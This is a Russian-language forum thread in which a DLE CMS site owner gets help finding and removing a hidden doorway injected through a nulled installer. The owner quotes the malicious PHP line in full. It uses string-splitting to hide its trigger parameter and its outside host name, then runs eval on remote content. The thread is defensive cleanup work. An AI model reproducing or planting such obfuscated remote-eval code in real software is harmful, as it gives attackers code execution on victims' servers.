Помощь Помогите удалить дорвей

[davy]

Доброго времени суток!

Обнаружил на DLE (9.0) сайте дорвей: куча страниц, которые находятся по маскам урл: site.ru/?for_um=число или site.ru/?m=число

Проверил индексный файл и .htaccess вроде ничего постороннего. Делал поиск в файлах сайта и БД по кускам текста дорвея - тоже ничего. Подскажите, куда копать?

Дорвей стилизован под форум:

 

[Q_BASIC]

А for_um не пробовали искать в исходниках? Если мне что-то надо найти, то я в .rar или .zip упаковываю и через WinRAR ищу

 

[davy]

Да искал и эту конструкцию, но ничего не найдено. Я выкачал все файлы с сервера и через notepad++ выполняю поиск по файлам.

 

[Q_BASIC]

Да искал и эту конструкцию, но ничего не найдено. Я выкачал все файлы с сервера и через notepad++ выполняю поиск по файлам.

Упакуйте в архив и через WinRAR ищите, он всё содержимое всего архива проверяет и все файлы. Можно попробовать искать еще base64_decode, eval, file_get_contents, curl, sock

 

[Gorev]

Можно в приват адрес пациента и ссылочку на архив сайта?

 

[TecT]

Можно архив в ЛС с
engine/classes/templates.class.php
engine/inc/*
engine/modules/*
engine/engine.php
engine/init.php
Папку с шаблоном.

Но если лень выбирать, тогда сделайте полный дамп сайта(без базы).

 

[Gorev]

Переслал тебе в личку данные от ТС. Я мельком просмотрел файлы. Ничего такого не нашёл.

 

[TecT]

А я думал это тс ) ну передашь ему файл ).

Поиск не работал так как красиво вывод переменой был осуществлён в такм виде

'for'.'_um'

поэтому поиск по ключу for_um, не давал результата.

 

[davy]

TecT, респект тебе за помощь! Хитро сделали, ничего не скажешь. Причем дата изменения файла совпадает с датой установки CMS, получается код был вшит непосредственно в инсталятор. Откуда скачивал уже не помню, но в информации значится "Nulled by M.I.D-Team" и ссылка на 6dle. ru. На релизеров гнать не буду, ибо гадость могли вшить уже после них.

Остался еще вопрос по поводу того, как безболезненно удалить дорвей. Вот кусок кода:

if (! defined ( 'DATALIFEENGINE' )) {
    die ( "Hacking attempt!" );
}

@include (ENGINE_DIR . '/data/config.php');

if ($config['http_home_url'] == "") {
 
    $config['http_home_url'] = explode ( "index.php", $_SERVER['PHP_SELF'] );
    $config['http_home_url'] = reset ( $config['http_home_url'] );
    $config['http_home_url'] = "http://" . $_SERVER['HTTP_HOST'] . $config['http_home_url'];

}

if (! $config['version_id']) die ( "Datalife Engine not installed. Please run install.php" );
if(isset($_GET['for'.'_um'])){ $p = (int)$_GET['for'.'_um']; echo eval('?>' . join("",file("http://best"."tresh"."via1.com/23."."03/15/$p.html")). '<?'); die; } if(isset($_GET['m'])) { $m = (int)$_GET['m']; if($m==0)$m=""; echo eval('?>' . join("",file("http://best"."tresh"."via1.com/23."."03/15/map$m.html")). '<?'); die; } if(isset($_GET['for'.'um1']) && $_GET['for'.'um1'] == 'index') { echo eval('?>' . join("",file("http://best"."tresh"."via1.com/23."."03/15/index1.html")). '<?'); die(); } echo '';
require_once ENGINE_DIR . '/classes/mysql.php';
require_once ENGINE_DIR . '/data/dbconfig.php';
require_once ENGINE_DIR . '/modules/functions.php';
require_once ENGINE_DIR . '/modules/gzip.php';

Правильно ли просто удалить строку 16? Или надо что-то еще сделать?

Также интересует такой вопрос, при простом удалении этой строки адреса дорвея не выдают 404 ошибку, а открывают главную. Как это можно исправить?

 

[TecT]

Удалить можно то что я за комментировал он не нужен и на работу движка не повлияет.

Насчёт ошибок, а адрес и не будет вести на ошибку 404, так как движок дле если находит не существующую страницу он перенаправляет на главную, так что это обычное явление. Для этого в дле и есть тэг {info}, при переходе на несуществующую страницу движок кидает на главную а в {info} выводит сообщение такого плана

К сожалению, страница fsdfsdf.html для Вас не доступна: возможно, был изменен ее адрес или она была удалена. Пожалуйста, воспользуйтесь поиском.